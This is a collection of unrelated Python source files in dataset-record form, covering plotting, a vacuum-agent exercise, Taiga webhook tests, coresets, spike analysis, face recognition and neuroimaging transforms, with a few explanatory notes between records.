legs=0\n    \n    \n    # # titles_acc = [\"3D Pose (Movement)\", \"3D Pose + Gaze\", \"{}% of accuracy\".format(int(th_acc[0]*100)), \"{}% of accuracy\".format(int(th_acc[1]*100))]\n    # for line in ax1.children:\n    #     if line.type == 'graph2d.lineseries':\n    #         #x = line.properties.XData\n    \n    #         y = line.properties.YData\n    #         total = len(y)\n    #         x = np.array([ i / float(total) for i in range(total)])\n    #         axs[1].plot(x,y)\n    #     axs[1].axhline(y=th_acc[0], color='B', linestyle='-.')\n    #     axs[1].axhline(y=th_acc[1], color='k', linestyle='--')\n    #     axs[1].legend(titles_acc, loc='lower right')\n    #     axs[1].set_title(\"Schydlo et al., 2018\")\n    #     axs[1].set_xlabel(\"Observation Ratio\")\n    #     axs[1].set_ylabel(\"Accuracy\")\n\n    #fig.suptitle(\"Complete Dataset - All Information\", fontsize=15, weight=\"bold\")\n\n    #plt.title(\"Actions {}\".format(\",\".join([str(i +1) for i in actions])))\n    #plt.title(\"All Actions\")\n    plt.show()\n\n\ndef entropy(probs):\n    return 
-(probs*np.log(probs)).sum()\n\ndef calc_uncertainties(probs):\n    # probs is (timesteps, samples, classes) for MC predictions, else (timesteps, classes)\n    #vr= np.argmax(probs, axis= 2).mean(1) #variation ratio\n    if len(probs.shape) > 2:\n        mean = probs.mean(1)\n        h = -(mean*np.log(mean)).sum(1) #predictive entropy H[E[p]]\n        e = -(probs*np.log(probs)).sum(2).mean(1) #expected entropy E[H[p]]\n    else: \n        mean = probs.mean(0)\n        h = -(mean*np.log(mean)).sum(0) #predictive entropy\n        e = -(probs*np.log(probs)).sum(1).mean(0) #expected entropy\n    \n    # mutual information (BALD) is the difference of the two entropies, not their sum\n    return h, e, h - e\n\n\n\nif __name__ == \"__main__\": \n    # show_video()\n    # generate_video()\n    # plot_probability_threshold()\n    plot_conf_matrix()\n    # plot_uncertainty_threshold()\n    #plot_uncertainty()\n    #plot_all_charts()\n    #plot_acc_classes()\n    # plot_uncertainty()\n\n    \n\n\n\n\n","sub_path":"RTgesture/plot_predictions.py","file_name":"plot_predictions.py","file_ext":"py","file_size_in_byte":42234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
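The calc_uncertainties helper above is the basis for the whole uncertainty analysis. As a reference point, here is a self-contained sketch of the standard MC-dropout decomposition it corresponds to (predictive entropy, expected entropy, and their difference, the BALD mutual information); the function name, the epsilon guard, and the (timesteps, mc_samples, classes) shape convention are assumptions mirroring the code above, not part of the original file.

import numpy as np

def mc_dropout_uncertainties(probs, eps=1e-12):
    # probs: (timesteps, mc_samples, classes), each row a softmax distribution
    mean = probs.mean(axis=1)                                          # E[p]
    predictive_entropy = -(mean * np.log(mean + eps)).sum(-1)          # H[E[p]]
    expected_entropy = -(probs * np.log(probs + eps)).sum(-1).mean(1)  # E[H[p]]
    mutual_information = predictive_entropy - expected_entropy         # BALD score
    return predictive_entropy, expected_entropy, mutual_information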
+{"seq_id":"376121199","text":"import agents as ag\nimport random\n\ndef HW2Agent() -> object:\n\n def updatemap(Lastaction,currentPos,Bump):\n newPos = (0,0)\n if Lastaction == 'Left' and Bump == 'Bump':\n #program.map.append[currentPos][0]= 1\n program.bounds[0] = currentPos[0]\n print(str(program.bounds) + 'Left Bump')\n program.hasBumped[0] = True\n #program.bumpCount = program.bumpCount + 1\n #program.currentPos= (currentPos[0]-1, currentPos[1])\n print(program.currentPos)\n elif Lastaction == 'Up' and Bump == 'Bump':\n # program.map[currentPos][1] = 1\n program.bounds[1]=currentPos[1]\n program.hasBumped[1] = True\n program.bumpCount = program.bumpCount + 1\n print(str(program.bounds) + 'Up Bump')\n #program.currentPos = (currentPos[0], currentPos[1]+1)\n print(program.currentPos)\n elif Lastaction == 'Right' and Bump == 'Bump':\n # program.map[currentPos][2] = 1\n program.bumpCount = program.bumpCount + 1\n program.bounds[2]=currentPos[0]\n program.hasBumped[2] = True\n print(str(program.bounds) + 'Right Bump')\n #program.currentPos=(currentPos[0]+1,currentPos[1])\n print(program.currentPos)\n elif Lastaction == 'Down' and Bump == 'Bump':\n # program.map[currentPos][3] = 1\n program.bumpCount = program.bumpCount + 1\n program.bounds[3] = currentPos[1]\n program.hasBumped[0] = True\n print(str(program.bounds) + 'Down Bump')\n #program.currentPos = (currentPos[0], currentPos[1]-1)\n #print('CurrentPos:' + str(program.currentPos))\n\n\n\n elif Lastaction == 'Left' and Bump != 'Bump':\n program.currentPos = (currentPos[0] - 1, currentPos[1])\n elif Lastaction == 'Up' and Bump != 'Bump':\n # program.map[currentPos][1] = 0\n # program.bounds[1]=currentPos[1\n program.currentPos = (currentPos[0], currentPos[1]+1)\n elif Lastaction == 'Right' and Bump != 'Bump':\n #program.map[currentPos][2] = 0\n # program.bounds[2]=currentPos[2]\n program.currentPos = (currentPos[0] + 1, currentPos[1])\n elif Lastaction == 'Down' and Bump != 'Bump':\n #program.map[currentPos][3] = 0\n #program.bounds[3] = currentPos[3]\n program.currentPos = (currentPos[0], currentPos[1] - 1)\n\n print('CurrentPos out:' + str(program.currentPos))\n print('BumpCount: '+ str(program.bumpCount))\n\n\n\n #def evalMove():\n\n\n\n\n\n\n\n\n\n def program(percept):\n bump, status = percept\n lastAction = program.oldActions[-1]\n \"\"\"\"\"\n if bump == 'Bump':\n program.bumpCount = program.bumpCount + 1\n if program.currentPos[0] == program.bounds[0] or program.currentPos[0] == program.bounds[2] or program.currentPos[1] == program.bounds[1] or program.currentPos[1]== program.bounds[3]:\n program.bumpCount = program.bumpCount + 1\n if program.bumpCount == 4:\n program.hasBounds = True\n program.bounds[0]= program.bounds[0] + 1\n program.bounds[1] = program.bounds[1]-1\n program.bounds[2] =program.bounds[2]-1\n program.bounds[3] =program.bounds[3]+1\n program.bumpCount =0\n \"\"\"\n\n #if program.bounds[0] != -100 and program.bounds[1]!= 100 and program.bounds[2] != 100 and program.bounds[3] != -100:\n # program.hasBounds = True\n \"\"\"\n if program.currentPos[0] == program.bounds[0] and program.hasBounds == True or program.currentPos[0] == program.bounds[2] and program.hasBounds == True or program.currentPos[1]== program.bounds[1] and program.hasBounds == True or program.currentPos[1] == program.bounds[3] and program.hasBounds == True:\n program.bumpCount= program.bumpCount +1\n print('Bound Bump')\n if program.bumpCount % 4 == 0:\n program.bounds[0] = program.bounds[0] + 1\n program.bounds[1] = program.bounds[1] - 1\n 
program.bounds[2] = program.bounds[2] - 1\n program.bounds[3] = program.bounds[3] + 1\n \"\"\"\n if status == 'Dirty':\n action = 'Suck'\n else:\n lastBump, lastStatus, = program.oldPercepts[-1]\n\n if bump == 'None' and program.currentPos[0] <= program.bounds[2]:\n action = 'Right'\n if bump == 'Bump' and program.currentPos[1] <= program.bounds[1] or lastAction == 'Up' and program.currentPos[1] <= program.bounds[1]:\n action = 'Up'\n if bump == 'Bump' and lastAction == 'Up' and program.currentPos[0]>= program.bounds[0] or lastAction == 'Left' and program.currentPos[0]>= program.bounds[0]:\n action = 'Left'\n if bump =='Bump' and lastAction== 'Left' and program.currentPos[1]>= program.bounds[3] or lastAction == 'Down' and program.currentPos[1]>= program.bounds[3]:\n action = 'Down'\n if bump =='Bump' and lastAction =='Down':\n action = 'Right'\n\n \"\"\"\"\n if bump == 'None' and program.currentPos[0] <= program.bounds[2] and program.hasBounds==True:\n action = 'Right'\n if program.currentPos[1] <= program.bounds[1] or lastAction == 'Up' and program.currentPos[1] <= program.bounds[1] and program.hasBounds==True:\n action = 'Up'\n if lastAction == 'Up' and program.currentPos[0]>= program.bounds[0] or lastAction == 'Left' and program.currentPos[0]>= program.bounds[0] and program.hasBounds==True:\n action = 'Left'\n if lastAction== 'Left' and program.currentPos[1]>= program.bounds[3] or lastAction == 'Down' and program.currentPos[1]>= program.bounds[3] and program.hasBounds==True:\n action = 'Down'\n if lastAction =='Down' and program.hasBounds==True:\n action = 'Right'\n \"\"\"\n\n \"\"\"\"\"\n if program.hasBounds == True and lastAction=='Right' and program.currentPos[0]==program.bounds[1]:\n action == 'Up'\n if program.hasBounds == True and lastAction=='Up' and program.currentPos[1]< program.bounds[2] or program.hasBounds==True and lastAction == 'Left' and program.currentPos[0] >= program.bounds[0]:\n action == 'Left'\n if program.hasBounds == True and lastAction=='Left' or program.hasBounds==True and lastAction == 'Down' and program.currentPos >= program.bounds[3]:\n action == 'Down'\n \"\"\"\n\n\n\n\n\n\n\n\n #updatemap(lastAction, program.currentPos, program.oldPercepts[-1][0])\n program.oldPercepts.append(percept)\n program.oldActions.append(action)\n print('Bump in:' + bump)\n print('CurrentPos in:' + str(program.currentPos))\n print('Last Action:' + lastAction)\n updatemap(lastAction, program.currentPos, bump)\n\n #print(program.bounds)\n\n return action\n\n # assign static variables here\n program.oldPercepts = [('None', 'Clean')]\n program.oldActions = ['NoOp']\n program.bumpCount = 0\n program.hasBumped=[False,False,False,False]\n program.hasBounds= False\n program.currentPos=(0,0)\n program.bounds = [-100,100,100,-100]\n print(program.bounds)\n\n agt = ag.Agent(program)\n # assign class attributes here:\n # agt.direction = ag.Direction('left')\n\n return agt\n\n","sub_path":"submissions/Colburn/vacuum2.py","file_name":"vacuum2.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
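The bump-handling chain in updatemap above repeats the same bookkeeping four times, and marks the wrong side on a 'Down' bump (hasBumped[0] instead of hasBumped[3]). A table-driven version avoids that class of slip; this is a sketch only, with the attribute names borrowed from the agent above and the (dx, dy, side) tuples as an assumed convention.

# Maps each action to its position delta and to the index of the wall it can hit.
MOVES = {'Left': (-1, 0, 0), 'Up': (0, 1, 1), 'Right': (1, 0, 2), 'Down': (0, -1, 3)}

def update_position(pos, action, bumped, bounds, has_bumped):
    dx, dy, side = MOVES[action]
    if bumped:
        # Record the wall coordinate instead of moving.
        bounds[side] = pos[0] if action in ('Left', 'Right') else pos[1]
        has_bumped[side] = True
        return pos
    return (pos[0] + dx, pos[1] + dy)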
+{"seq_id":"288860993","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2014-2017 Andrey Antukh \n# Copyright (C) 2014-2017 Jesús Espino \n# Copyright (C) 2014-2017 David Barragán \n# Copyright (C) 2014-2017 Alejandro Alonso \n# Copyright (C) 2014-2017 Anler Hernández \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nimport pytest\nfrom unittest.mock import patch\nfrom unittest.mock import Mock\n\nfrom .. import factories as f\n\nfrom taiga.projects.history import services\n\n\npytestmark = pytest.mark.django_db(transaction=True)\n\n\nfrom taiga.base.utils import json\n\ndef test_webhooks_when_create_milestone(settings):\n settings.WEBHOOKS_ENABLED = True\n project = f.ProjectFactory()\n f.WebhookFactory.create(project=project)\n f.WebhookFactory.create(project=project)\n\n obj = f.MilestoneFactory.create(project=project)\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner)\n assert send_request_mock.call_count == 2\n\n (webhook_id, url, key, data) = send_request_mock.call_args[0]\n assert data[\"action\"] == \"create\"\n assert data[\"type\"] == \"milestone\"\n assert data[\"by\"][\"id\"] == obj.owner.id\n assert \"date\" in data\n assert data[\"data\"][\"id\"] == obj.id\n\n\ndef test_webhooks_when_update_milestone(settings):\n settings.WEBHOOKS_ENABLED = True\n project = f.ProjectFactory()\n f.WebhookFactory.create(project=project)\n f.WebhookFactory.create(project=project)\n\n obj = f.MilestoneFactory.create(project=project)\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner)\n assert send_request_mock.call_count == 2\n\n obj.name = \"test webhook update\"\n obj.save()\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner, comment=\"test_comment\")\n assert send_request_mock.call_count == 2\n\n (webhook_id, url, key, data) = send_request_mock.call_args[0]\n assert data[\"action\"] == \"change\"\n assert data[\"type\"] == \"milestone\"\n assert data[\"by\"][\"id\"] == obj.owner.id\n assert \"date\" in data\n assert data[\"data\"][\"id\"] == obj.id\n assert data[\"data\"][\"name\"] == obj.name\n assert data[\"change\"][\"comment\"] == \"test_comment\"\n assert data[\"change\"][\"diff\"][\"name\"][\"to\"] == data[\"data\"][\"name\"]\n assert data[\"change\"][\"diff\"][\"name\"][\"from\"] != data[\"data\"][\"name\"]\n\n\ndef test_webhooks_when_delete_milestone(settings):\n settings.WEBHOOKS_ENABLED = True\n project = f.ProjectFactory()\n f.WebhookFactory.create(project=project)\n f.WebhookFactory.create(project=project)\n\n obj = f.MilestoneFactory.create(project=project)\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner, delete=True)\n assert send_request_mock.call_count == 2\n\n (webhook_id, url, key, data) = send_request_mock.call_args[0]\n 
assert data[\"action\"] == \"delete\"\n assert data[\"type\"] == \"milestone\"\n assert data[\"by\"][\"id\"] == obj.owner.id\n assert \"date\" in data\n assert \"data\" in data\n","sub_path":"tests/integration/test_webhooks_milestones.py","file_name":"test_webhooks_milestones.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
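The tests above all follow the same pattern: replace the outbound webhook call with a mock, trigger a snapshot, then assert on call_count and call_args. A minimal standalone illustration of that pattern (the notify function and its arguments are hypothetical, not taiga code):

from unittest.mock import Mock

def notify(url, payload, send):
    send(url, payload)

def test_notify_sends_payload():
    send_mock = Mock()  # stand-in for something like _send_request
    notify('http://example.com', {'action': 'create'}, send_mock)
    assert send_mock.call_count == 1
    url, payload = send_mock.call_args[0]
    assert payload['action'] == 'create'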
+{"seq_id":"25533967","text":"import ast\nimport inspect\nimport textwrap\nfrom typing import Callable, cast, Dict, Set\n\n\nclass DependencyParser(ast.NodeVisitor):\n secondary_attributes: Dict[str, Set[str]]\n\n def __init__(self, func: Callable):\n if type(func) == type:\n func = cast(object, func).__init__\n spec: inspect.Signature = inspect.signature(func)\n params = spec.parameters\n assert len(params) == 2\n param: inspect.Parameter = params[list(params.keys())[1]]\n source = textwrap.dedent(inspect.getsource(func))\n\n else:\n spec: inspect.Signature = inspect.signature(func)\n params = spec.parameters\n assert len(params) >= 1\n param: inspect.Parameter = params[list(params.keys())[0]]\n source = inspect.getsource(func)\n\n assert (param.kind == param.POSITIONAL_ONLY or\n param.kind == param.POSITIONAL_OR_KEYWORD)\n\n self.arg_name = param.name\n\n self.required = set()\n self.secondary_attributes = {}\n self.is_referenced = False\n\n source = textwrap.dedent(source)\n parsed = ast.parse(source)\n self.visit(parsed)\n\n def visit_Attribute(self, node: ast.Attribute):\n if isinstance(node.value, ast.Name) and node.value.id == self.arg_name:\n self.required.add(node.attr)\n elif (isinstance(node.value, ast.Attribute) and\n isinstance(node.value.value, ast.Name) and\n node.value.value.id == self.arg_name):\n self.required.add(node.value.attr)\n if node.value.attr not in self.secondary_attributes:\n self.secondary_attributes[node.value.attr] = set()\n self.secondary_attributes[node.value.attr].add(node.attr)\n else:\n for child in ast.iter_child_nodes(node):\n self.visit(child)\n\n def visit_Name(self, node: ast.Name):\n if node.id == self.arg_name:\n self.is_referenced = True\n print(f\"Referenced {node.id} in {node.lineno}:{node.col_offset}\")\n","sub_path":"labml/internal/configs/dependency_parser.py","file_name":"dependency_parser.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"129206857","text":"import numpy as np\nfrom .coreset import Coreset\nfrom ..util.errors import NumericalPrecisionError \n\nclass IterativeCoreset(Coreset):\n\n def __init__(self, **kw):\n super().__init__(**kw)\n self._itr = 0\n \n def reset(self):\n super().reset()\n self._itr = 0\n\n def _build(self, sz, itrs):\n itr_limit = self._itr + itrs\n retried_already = False\n while self._itr < itr_limit and (not self._terminate_on_size() or self.size() < sz):\n try:\n self._step(sz, self._itr)\n retried_already = False #refresh retried flag after a successful step\n self._itr += 1\n except NumericalPrecisionError as e: #a special error type for this library denoting possibly reaching numeric precision limit\n self.log.warning('numerical precision error: ' + str(e))\n if retried_already:\n self.log.warning('iterative step failed a second time. Assuming numeric limit reached.')\n self.reached_numeric_limit = True\n break\n else:\n self.log.warning('iterative step failed. Stabilizing and retrying...')\n retried_already = True\n self._stabilize()\n if self.reached_numeric_limit:\n break\n #done\n\n def _terminate_on_size(self):\n return True\n \n def _step(self, sz, itr):\n raise NotImplementedError()\n\n def _stabilize(self):\n pass #implementation optional; try to refresh cache/etc to make _step pass\n\n","sub_path":"bayesiancoresets/base/iterative.py","file_name":"iterative.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"607588660","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef beststudent(filename):\n total = 0\n try:\n with open(filename) as f:\n for data in f:\n data = data.split()\n try:\n if int(data[0]) > total:\n total = int(data[0])\n name = \" \".join((data[1:]))\n except ValueError:\n print('Invalid mark {} encountered. Skipping.'.format(data[0]))\n print('Best student:', name)\n print('Best mark:', total)\n except FileNotFoundError:\n print('The file {} could not be opened.'.format(filename))\n\ndef main():\n filename = sys.argv[1]\n beststudent(filename)\n\nif __name__ == '__main__':\n main()\n","sub_path":"ca117/lab-022/beststudent_v3_022.py","file_name":"beststudent_v3_022.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"108468888","text":"#coding:utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport os\nr = requests.get(\"http://m.699pic.com/tupian/chahua-so.html\")\n# print(r.content)\nsoup = BeautifulSoup(r.content,\"html.parser\")\n# print(soup)\nimages = soup.find_all(class_=\"lazy\")\n# print(images)\npath = \"D:\\\\Testing tools\\\\muke\\AutoTest\\\\auto_python\\\\bs4\\\\images\\\\\"\nfor i in images:\n try:\n url = i['src']\n name = i['alt']\n # print(url,name)\n ima = requests.get(url)\n \n with open(path+name+\".jpg\",\"wb\") as f:\n f.write(ima.content)\n except Exception as msg:\n print(msg)\n \n\n","sub_path":"auto_python/bs4/zhuatu.py","file_name":"zhuatu.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"80835990","text":"# Function for nth Fibonacci number\n\ndef Fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return Fibonacci(n - 1) + Fibonacci(n - 2)\n\n\nnum = int(input(\"enter a number between 0 and 30 :\\n\"))\n\nif num < 0 or num > 30:\n print(\"wrong entry\")\nelse:\n print(Fibonacci(num))\n\n\n\n\n\n\n#","sub_path":"fibnaocci_recursive.py","file_name":"fibnaocci_recursive.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"149901911","text":"\"\"\"\n\n Measure a gate trace with a linear sweep\n\n Author: Bart Limburg\n Version: 12/07/2017\n\"\"\"\nfrom imports.data import Data\nfrom imports.hp4156a import HP\nfrom imports.functions import sleep\n\ndef init():\n return HP(source=1, drain=2, gate=3, screen_refresh=False)\n\ndef start(instr,name, dev): # This function is run for every device from main.py.\n print(\"Measuring Gate trace (HP) of experiment %s at device %s\" % (name,dev))\n # configure the sweep\n\n data_IVg = Data(name='%s_IV_HP' % name, dev = dev,coordinates='Vg',values='Isd') #create the data file\n\n [v,i] = instr.sweep_triangle(v_min=-0.4,v_max=0.4,v_step=0.01,electrode='source')\n\n\n data_IVg.fill(v,i)\n data_IVg.plot()\n data_IVg.close()\n\n print(\"Measurement completed.\")\n\ndef end(instr, name):\n instr.zero()\n","sub_path":"experiments/HP_IV.py","file_name":"HP_IV.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"309563314","text":"import joblib\nfrom torch import nn\nimport torch\nfrom knock71 import NN\n\nif __name__ == \"__main__\":\n trainf_np = joblib.load('train_feature.pkl')\n train_x = torch.from_numpy(trainf_np)\n trainl_np = joblib.load('train_label.pkl')\n train_y = torch.from_numpy(trainl_np)\n\n model = NN(300, 256, 4) \n criterion = nn.CrossEntropyLoss()\n\n loss = criterion(model(train_x[:4].float()), train_y[:4])\n model.zero_grad()\n loss.backward()\n\n print('loss: ' + str(loss))\n print('gradient: \\n' + str(model.output.weight.grad))\n\n'''\nloss: tensor(2.9821, grad_fn=)\ngradient:\ntensor([[-0.9348, 0.3831, 1.1587, ..., 0.5627, -0.2966, 0.1505],\n [ 3.6555, -1.5159, -4.5666, ..., -2.2121, 1.1609, -0.6112],\n [-1.0458, 0.4359, 1.3220, ..., 0.6385, -0.3333, 0.1830],\n [-1.6749, 0.6969, 2.0859, ..., 1.0108, -0.5310, 0.2777]])\n'''","sub_path":"oryza/chapter08/knock72.py","file_name":"knock72.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17763491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # An example of a typical data pipeline in neuroscience\n\n# In[1]:\n\n\nimport numpy as np\nimport pylab as pl\n# get_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# ## 1) Loading and plotting the data\n\n# First, we have to load the data from a directory. This specific file contains voltage values as function of time. What is measured is the voltage value close to an electrically active cells, a brain cell, as a function of time. The data format is raw text and the sampling is done at 50 mus per voltage value\n\n# In[2]:\n\n\nVtrace = np.loadtxt('./data/john_experiment_0.dat')\ntbins = np.arange(0, 60, 0.00005) # 1 min recording with 50mu s sampling\n\n\n# In[3]:\n\n\npl.plot(tbins[0:100000], Vtrace[0:100000], label = 'V trace')\nthreshold = -40\npl.plot(tbins[0:100000], np.ones(100000)*threshold, '--r', label = 'Threshold')\npl.xlabel('Time (s)')\npl.ylabel('Voltage (mV)')\npl.legend()\n\n\n# The data shows a measurement of a voltage as function of time. In addition to a noisy baseline, there are sharp peaks visible. These so-called spikes constitute the fundamental unit of electrical activity of nerve cells. The rest of this notebook is concerned with the extraction and analysis of these spikes.\n\n# ## 2) Extracting spikes: the central object in the dataset\n\n# The simplest method to identify spikes in a dataset is thresholding the numbers, and identifying the timepoints where the voltage exceeded some threshold. Here is is set to -40, but this number can be found automatically, e.g. by setting it to -np.std(Vtrace).\n\n# In[4]:\n\n\nabove = (Vtrace < threshold)\nspikes = above[1:] < above[0:-1]\n\nspikeTimes = tbins[np.where(spikes)]\nspikeVoltages = Vtrace[np.where(spikes)]\n\npl.plot(tbins, Vtrace, spikeTimes, spikeVoltages, 'xr')\npl.xlim([2.985, 3.0])\npl.xlabel('Time (s)')\npl.ylabel('Voltage (mV)')\n\n\n# The plot shows a typical spike: a short biphasic voltage pulse about 2ms long.\n# \n# Now that the spiketimes [i.e. the times when a spike occured] have been saved, we can study some of their statistical properties.\n\n# ## 3) Spike time analysis\n\n# First, let's look at the inter-spike intervals, i.e. the distribution of waiting times between two of these events.\n\n# In[5]:\n\n\nISI = np.diff(spikeTimes)\nISIhist = pl.hist(ISI*1000, 30)\npl.xlabel('Time (ms)')\npl.ylabel('Frequency')\n\n\n# As final results of this pipeline, we fit a model to this distribution, and print the fit parameters. The model is a log-normal distribution, i.e. a fit with an Gaussian to the logairhtms of the interspike intervals.\n\n# In[6]:\n\n\nimport scipy.optimize as opt\nimport scipy as sc\n\ndef normpdf(x, mu, sd, denom):\n num = np.exp(-(x-mu)**2/(2*sd*sd))\n return num/denom\n\nprobabilities = ISIhist[0]/np.sum(ISIhist[0])\ndistance_between_spikes = ISIhist[1][:-1]\n\npopt, pcov = opt.curve_fit(normpdf, np.log(distance_between_spikes), probabilities)\nprint(popt)\n\n\n# In[7]:\n\n\ndata_fitted = normpdf(np.log(distance_between_spikes), *popt)\n\n\n# In[8]:\n\n\npl.plot(distance_between_spikes, probabilities,'o', label = 'data')\npl.plot(distance_between_spikes, data_fitted,'r-', label = 'Fit with log-normal distribution')\npl.xlabel('Time (ms)')\npl.ylabel('Frequency')\npl.legend()\n\n\n# This modelpipeline ends here. We have ingested the raw data, identified spikes, calculated the inter spike intervals, and fitted a model function to it. 
In the remaining exercise, we will translate this pipeline into one of the standard forms in neuroscience.\n\n# In[ ]:\n\n\n\n\n","sub_path":"problem_3/neuro_pipeline.py","file_name":"neuro_pipeline.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
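The detection step of the pipeline above, packaged as a reusable function: a spike is marked at the sample where the trace comes back up through the (negative) threshold. The names and the toy trace are illustrative only.

import numpy as np

def detect_crossings(trace, threshold):
    below = trace < threshold
    # True exactly where `below` flips True -> False (upward re-crossing)
    crossings = below[:-1] & ~below[1:]
    return np.where(crossings)[0]

v = np.full(1000, -55.0)
v[500:505] = -70.0                         # one downward "spike"
print(detect_crossings(v, threshold=-60))  # expected: [504]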
+{"seq_id":"341779405","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\ntry:\n from sklearn.externals import joblib\nexcept ImportError:\n import joblib\nfrom face_csv import get_csv_to_dic\n \n\ndef trimming_face_image(image, face, size=(40,40)):\n \"\"\"\n 画像から顔を切り取り,リサイズした画像を返す\n \"\"\"\n for x, y, w, h in face:\n # スライシングで顔の部分を切り取る\n face_image = image[y:y+h, x:x+w]\n # リサイズする \n face_image = cv2.resize(face_image, size)\n return face_image\n\ndef get_predicted(face_image, clsfile, IMAGE_SIZE=40, IMAGE_SIZE_Y=40, COLOR_BYTE=3):\n \"\"\"\n clsfileから分類機を読み込みface_imageを分類し予想結果を整数で返す\n \"\"\" \n # 学習済のファイルを読み込む\n loaded_cls = joblib.load(clsfile)\n # 学習モデルの形式に変換\n flat_face_image = face_image.reshape((-1, IMAGE_SIZE * IMAGE_SIZE_Y * COLOR_BYTE))\n # 誰の顔か予測する\n predicted = loaded_cls.predict(flat_face_image)[0]\n return predicted\n\n\n# HaarLike特徴抽出アルゴリズムのパス\n# 任意のパス\nHAAR_FILE = \"haarcascade_frontalface_alt.xml\"\n# 学習した分類機のファイル\nclsfile = \"face_result_arasi.pkl\"\n\nIMAGE_SIZE = 40\nIMAGE_SIZE_Y = 40\nCOLOR_BYTE = 3\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\ncsv_file = \"train_data_arasi.csv\"\nname_dic = get_csv_to_dic(csv_file)\n\ncap = cv2.VideoCapture(0)\nwhile True: \n # 映像データを読み込んでサイズ変更\n rst, stream = cap.read()\n stream = cv2.resize(stream, (320,240))\n \n # HaarLike特徴抽出アルゴリズムから分類器を作成\n cascade = cv2.CascadeClassifier(HAAR_FILE)\n # 実際に分類を行う\n face = cascade.detectMultiScale(stream)\n\n # 認識したものが一つの時処理を行う\n if len(face) == 1:\n face_image = trimming_face_image(stream, face)\n predicted = get_predicted(face_image, clsfile)\n # 予測結果から名前を取得\n name_text = name_dic[str(predicted)]\n for x, y, w, h in face:\n # 認識した顔を赤い四角で囲う\n cv2.rectangle(stream, (x,y), (x+w,y+h), (0,0,255), 1)\n # 名前を表示\n cv2.putText(stream, name_text,(x,y-10), font, 1, (0,255,0), 3, cv2.LINE_AA)\n\n # 画像をウインドウに表示\n cv2.imshow(\"img\", stream)\n \n # 'q'を入力でアプリケーション終了\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n#終了処理\ncap.release()\ncv2.destroyAllWindows()","sub_path":"face_clf_40.py","file_name":"face_clf_40.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"342866016","text":"import templateflow.api as tf\nfrom ...utils import transforms\n\nrelpath = './esfmri_connectivity/parcellation/amygdala/'\n\ntransform = tf.get(template='MNI152NLin2009cAsym', suffix='xfm', extension='h5')\nreference = tf.get(template='MNI152NLin2009cAsym', suffix='T1w', resolution=1, desc='brain', extension='nii.gz')\n\n#img path\nimgs = ['tpl-MNI152NLin6Asym_res-01_atlas-3roiamygdala_dseg.nii.gz']\nout_imgs = ['tpl-MNI152NLin2009cAsym_res-01_atlas-3roiamygdala_dseg.nii.gz']\n\nfor n, i in enumerate(imgs):\n transforms.antstransform(relpath, i, reference, transform, out_imgs[n])\n\n","sub_path":"esfmri_connectivity/parcellation/amygdala/reref_mniNLin6_to_mni2009c.py","file_name":"reref_mniNLin6_to_mni2009c.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
